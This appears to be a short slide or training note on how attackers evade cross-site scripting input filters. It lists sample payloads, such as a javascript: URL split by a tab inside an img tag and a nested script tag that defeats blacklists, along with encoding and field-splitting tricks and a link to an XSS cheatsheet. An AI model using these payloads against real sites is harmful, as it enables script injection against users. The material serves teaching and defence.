Attack Alert :: XSS Evasion
Attack Alert :: XSS Evasion
Attacker input filtering evasion:
No whitespace
<img src=
"java	script:alert('vulnerable');"
>
Blacklist script tags
<scr<script>ipt>
Using alternate character encodings
&
#00001100p...
Maxsize limits in fields
Chop exploit and join via /* */
XSS cheatsheet
http://ha.ckers.org/xss.html
(
local mirror
)
